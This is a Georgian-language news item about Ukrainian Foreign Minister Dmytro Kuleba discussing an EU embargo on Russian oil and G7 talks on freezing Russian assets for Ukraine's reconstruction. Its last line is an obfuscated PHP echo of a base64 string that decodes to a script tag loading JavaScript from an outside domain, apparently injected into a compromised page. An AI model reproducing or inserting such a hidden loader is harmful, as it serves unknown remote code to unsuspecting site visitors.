celsiusi
ავერსი საქკაბელი
უკრაინის საგარეო საქმეთა მინისტრმა დმიტრო კულებამ ​ვიდეომიმართვაში ისაუბრა რუსული ნავთობის ემბარგოზე, რომელსაც ამჟამად ევროკავშირის წევრი ქვეყნები განიხილავენ. 
 
კულებას თქმით, მისი გერმანიაში ვიზიტისას სრუსული გაზის ემბარგოს საკითხზეც ისაუბრეს.
 
გერმანიის ოფიციალურ პირებთან შეხვედრის შემდეგ კულება დიდი შვიდეულის წევრი ქვეყნების საგარეო საქმეთა მინისტრებს ესაუბრა.
 
"მინისტრები მიესალმებიან იმ აზრს, რომ აუცილებელია რუსული აქტივების გაყინვა და მათი გადაცემა უკრაინაში ჩვენი ქვეყნის აღდგენის მიზნით. აქ საუბარია ასობით მილიარდ ევროზე. ასევე, G7-მა განაცხადა, რომ ისინი მზად არიან მონაწილეობა მიიღონ უკრაინის აღდგენაში, მისი ქალაქებისა და ინფრასტრუქტურის რეკონსტრუქციაში. თქვენ იცით, რომ უკრაინის პრეზიდენტს აქვს იდეა, რომ ქვეყნებმა აიღონ პასუხისმგებლობა ომით დაზარალებულ გარკვეულ რეგიონებსა თუ ქალაქებზე და ჩვენი პარტნიორები ამ იდეას მიესალმებიან". – ამბობს კულება. 
681
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");